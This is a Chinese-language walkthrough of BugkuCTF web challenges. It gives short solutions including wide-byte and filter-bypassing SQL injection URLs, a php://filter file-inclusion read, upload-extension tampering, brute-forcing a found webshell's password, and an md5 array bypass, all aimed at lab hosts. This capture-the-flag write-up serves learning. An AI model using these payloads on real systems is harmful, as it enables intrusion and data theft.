BugkuCTF WEB

• web2

打开链接，一大堆表情

查看源代码

得到 flag

• 文件上传测试

打开链接

选择 1 个 jpg 文件进行上传，用 burp 抓包改包

将 php 改为 jpg，发包

得到 flag

• 计算器

在方框中输入 28，但是只能输入 1 个数字

F12 查看一下元素

这里的最长长度为 1，将它修改为 2，输入 28，点击验证

得到 flag

• web基础$_GET

给参数 what 传值 flag

访问 http://120.24.86.145:8002/get/?what=flag

得到 flag

web基础$_POST

打开链接

POST 方式传一个 值为 flag 的参数 what，就能得到 flag

• 矛盾

is_numeric() 判断参数 num 是否是一个数字，如果不是数字，则输出 $num 的值，如果 $num 的值等于 1，输出 flag

可以用科学计数法来表示 1

构造 http://120.24.86.145:8002/get/index1.php?num=1*e*0.1

得到 flag

• web3

打开链接

一片空白，右键查看源代码

解码一下

得到 flag

• sql 注入

打开链接

查询key表,id=1的string字段

加个单引号，没有什么变化，右键查看源代码

用宽字节注入

经查询，有 2 个字段数

查数据库，http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,database()%23

然后直接查询key表的string字段，http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,string%20from%20sql5.key%20--%20

得到 flag

• 域名解析

修改 /etc/hosts 文件

┌─[root@sch01ar]─[~]
└──╼ #vim /etc/hosts

添加一条 120.24.86.145 flag.bugku.com

添加完后，打开 flag.bugku.com

得到 flag

• SQL注入1

打开链接

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字！'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

用 %00 绕过过滤，http://103.238.227.13:10087/?id=-1%20un%00ion%20se%00lect%201,database()

然后直接查 key 表下的 id=1 的hash 字段，http://103.238.227.13:10087/?id=-1%20un%00ion%20se%00lect%201,hash%20fr%00om%20sql3.key

得到 flag

也可以利用代码中 xss 过滤来绕过

构造：http://103.238.227.13:10087/?id=-1 u<a>nion sel<a>ect 1,hash fr<a>om .key

• 你必须让他停下

打开链接，链接会一直刷新

当图片为 10.jpg 的时候，会出现图片

用 burp 查看返回包

当图片为 10.jpg 的时候，会出现 flag，不一定每次都出现

得到 flag

• 变量1

var_dump() 打印该参数，用全局变量 GLOBALS 可以打印出全部变量的值

得到 flag

• web5

右键查看源代码

右键查看元素，把这些字符复制到控制台，回车

全为大写就是 flag 了

• 头等舱

什么都没有，查看源码也没有，抓包看看

直接发包

在返回包中得到 flag

• 网站被黑

打开链接是一个黑页，题目是网站被黑，可能存在后门

猜了一个 1.php 不对，又猜了一个 shell.php

发现一个大马

猜了几个密码都没对，用 burp 爆破一下

爆出了一个 hack，输入

得到 flag

• WEB4

右键查看源代码

被 url 编码的 js 代码

进行 url 解码

进行拼接得到，67d709b2b54aa2aa648cf6e87a7114f1

输入，得到 flag

• flag在index里

点击

可能存在文件包含，读一下 index.php 文件看看

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

读出一串 base64 密文，解密一下

得到 flag

• 输入密码查看flag

用 burp 爆破

爆出来了，查看返回包

得到 flag

• 点击一百万次

要点击 1000000 次才能得到 flag

右键查看源代码

如果 clicks >= 1000000，就会 POST 发送 clicks

直接 POST clicks 的值为 1000000

得到 flag

• 备份是个好习惯

试了一下 index.php~，404

再试了 index.php.bak

下载下来

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

$_SERVER['REQUEST_URI'] 获取域名后面的值，包括“/”

$str = strstr($_SERVER['REQUEST_URI'], '?'); 为域名后的值，“?” 后的值，也就是参数，包括“?”

$str = substr($str,1);  为获取“?”后的值，不包括“?”

$str = str_replace('key','',$str); 如果有 key，把 key 替换成空，可以用 kekeyy 来绕过

parse_str() 函数会把查询字符串解析到变量中

如果 key1 和 key2 的 md5 值相等，且 key1 的值不等于 key2 的值，才会得到 flag

可以用数组来实现，因为 md5() 不能加密数组，所以会返回 null

index.php?kekeyy1[]=a&kekeyy2[]=b

得到 flag